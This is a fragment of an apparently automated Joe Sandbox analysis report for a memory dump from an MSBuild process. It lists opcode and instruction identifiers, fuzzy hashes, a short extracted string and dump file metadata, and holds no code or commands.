                                                                                  • Opcode ID: d0e0d20b1e39299c51f2368e5171f48632c88734b483cce99827e89a0d1c99ab
                                                                                  • Instruction ID: 7c6e1b51e89c99f90504aa9cf681159d38f6916070adb1e7e3f974ed47f09af5
                                                                                  • Opcode Fuzzy Hash: d0e0d20b1e39299c51f2368e5171f48632c88734b483cce99827e89a0d1c99ab
                                                                                  • Instruction Fuzzy Hash: 99C0802CD14144CFD3BAABE4D45C3787A11BB4170EF70012AB16386565BDB404C58712

                                                                                  Non-executed Functions

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: aq$ aq$xq$#q^$3q^
                                                                                  • API String ID: 0-123231816
                                                                                  • Opcode ID: c500c6e75d372a3fc671aa1b33e779d465fe5fb0101e30b9cd8c8737d07c97fa
                                                                                  • Instruction ID: d055f20f67fa9a68cc41a046934e73419bc91fd1199eed70cdca9ebf5e2d2d8e
                                                                                  • Opcode Fuzzy Hash: c500c6e75d372a3fc671aa1b33e779d465fe5fb0101e30b9cd8c8737d07c97fa
                                                                                  • Instruction Fuzzy Hash: EC619C38B003008FD725EB29D895B6A77E2BB84714F14862DE1159F7A5DFB6EC46CB80